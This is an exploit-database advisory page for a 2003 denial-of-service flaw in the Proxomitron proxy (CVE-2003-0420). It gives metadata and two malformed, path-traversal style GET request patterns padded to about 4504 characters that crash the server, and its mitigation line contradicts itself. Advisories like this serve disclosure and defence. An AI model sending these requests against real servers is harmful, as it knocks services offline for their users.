header-logo
Suggest Exploit
vendor:
Proxomitron
by:
Unknown
7.5
CVSS
HIGH
Denial of Service
20
CWE
Product Name: Proxomitron
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE: CVE-2003-0420
CPE: a:proxomitron_project:proxomitron
Metasploit:
Other Scripts:
Platforms Tested:
2003

Proxomitron String Handling Denial of Service Vulnerability

Proxomitron does not properly handle certain string types, which can be exploited by an attacker to cause a denial of service by crashing the server.

Mitigation:

There is no known mitigation for this vulnerability. It is advised to apply vendor patches or upgrade to a newer version.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/7954/info

It has been reported that Proxomitron does not properly handle some string types. Because of this, an attacker can cause the server to become unstable and crash. 

GET /../..0%%../ * (4504 chars)
GET \..\..\..\ * (4504 chars)

Navigation

Suggest Exploit

Services By CQR